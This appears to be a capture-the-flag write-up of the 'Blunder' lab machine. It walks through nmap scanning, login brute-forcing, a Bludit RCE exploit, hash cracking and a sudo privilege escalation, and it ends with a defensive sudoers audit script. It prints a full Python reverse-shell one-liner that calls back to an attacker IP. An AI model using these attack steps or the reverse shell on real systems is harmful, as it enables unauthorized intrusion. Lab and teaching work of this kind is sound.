🟢Blunder
Information:
Os: Linux
Difficulty: Easy
IP: 10.10.10.191
Enumeration
NMAP
nmap -sC -sS -sV -O -A -v -v 10.10.10.191
output:
PORT STATE SERVICE REASON VERSION
21/tcp closed ftp reset ttl 63
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
let's check the website (Apache running on port 80)

apparently it is a site about interesting facts
looking at the page source code, we have:

and this caught my attention:

we know the version is 3.9.2, but we still need to find out which CMS it is
by fuzzing the site we found some files under a directory named "bl-kernel"
searching for this structure, I found:

ok, the site is built with Bludit 3.9.2

we can try to use an exploit for CVE-2019-16113 and get RCE (Remote Code Execution)
BUT
this exploit needs a username and password, which we do not know
so let's find them out
for this, we can use:

code:
this code takes a wordlist and tries every word until it finds the password
but we still need the username...
going back to the enumeration stage, we find a file named "todo.txt".

now we know that there is a user called fergus
now let's test the passwords
but to generate a password list that makes sense, I will use a tool called "cewl", which collects the words from a site and builds a wordlist
cewl 10.10.10.191 -w wordlist.txt

now let's use that code to find out the password
python3 10.10.10.191 fergus wordlist.txt


finally we have the password; now we use the exploit for CVE-2019-16113
Getting Shell




now we have a shell, but a very limited one
improving this shell
to improve it, we will make this connection spawn another shell; for this we will use:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
(changing the IP to your own)

(on the right-hand screen we have the better shell, but still not a TTY)
to get a TTY, run the command:
python -c 'import pty;pty.spawn("/bin/bash")'
now we have to try to get access to another user (www-data doesn't have access to the user flag)
looking through the files readable by www-data, I found
/var/www/bludit-3.10.0a/bl-content/databases/users.php
here we see the user (hugo) and the hashed password
now let's crack the password hash
we need to find out which hash algorithm was used
for this I will use a site called tunnelsup
https://www.tunnelsup.com/hash-analyzer/

cracking it with https://www.dcode.fr/sha1-hash :

now we have the password, let's switch to that user

Privilege Escalation
running
sudo -l
to see which commands we can run through sudo, we see that the hugo user can run "(ALL, !root) /bin/bash", i.e. /bin/bash as any user except root

searching for this, we find that there is an exploit to escalate privileges

Let's use it
I will download the script to my machine and start a Python HTTP server in that folder, so that on the target machine I can fetch it from my IP.

now we are root; just grab the flag.
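From the defender's side, here is a small audit script I added to this writeup (it is not part of the original box notes or of any tool used above) that flags sudo rules shaped like the one found on hugo: a runas list that deny-lists root instead of allow-listing an account, a shell as the permitted command, and NOPASSWD. The sample rules are constructed; the regexes assume the usual sudoers `user host = (runas) [TAG:] command` layout and the `(runas) command` form that `sudo -l` prints.

```python
import re
from typing import Dict, List

# Constructed sample sudoers: the rule from this box plus two made-up rules for contrast.
SAMPLE_SUDOERS = """\
# user  host = (runas) [tags:] commands
hugo ALL=(ALL, !root) /bin/bash
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
backup ALL=(backup) /usr/local/bin/run-backup.sh
"""

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}
# "user host =" prefix of a sudoers line; absent in `sudo -l` output.
PREFIX_RE = re.compile(r"^\S+\s+\S+\s*=\s*")
# "(runas) TAG: cmd1, cmd2" -- runas defaults to root when omitted.
SPEC_RE = re.compile(r"^(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_rule(spec: str) -> List[str]:
    """Return findings for one '(runas) [TAG:] commands' spec (as printed by sudo -l)."""
    m = SPEC_RE.match(spec.strip())
    if not m:
        return ["unparsed rule: " + spec.strip()]
    findings: List[str] = []
    runas_users = [u.strip() for u in (m.group("runas") or "root").split(":")[0].split(",")]
    if any(u.startswith("!") for u in runas_users):
        findings.append("runas restriction by exclusion ('!' entry): deny-listing root is fragile, allow-list instead")
    if "ALL" in runas_users:
        findings.append("runas ALL: command may run as any account")
    cmds = [c.strip() for c in m.group("cmds").split(",")]
    if any(c.split()[0] in SHELLS for c in cmds):
        findings.append("permitted command is a shell: grants an interactive shell as the runas user")
    if "ALL" in cmds:
        findings.append("command ALL: any command permitted")
    if "NOPASSWD" in m.group("tags"):
        findings.append("NOPASSWD set")
    return findings


def audit_sudoers(text: str) -> Dict[str, List[str]]:
    """Map each user in sudoers-style text to the findings for its rule."""
    report: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        report[line.split()[0]] = audit_rule(PREFIX_RE.sub("", line, count=1))
    return report


if __name__ == "__main__":
    for user, findings in audit_sudoers(SAMPLE_SUDOERS).items():
        print(user, findings or ["ok"])
```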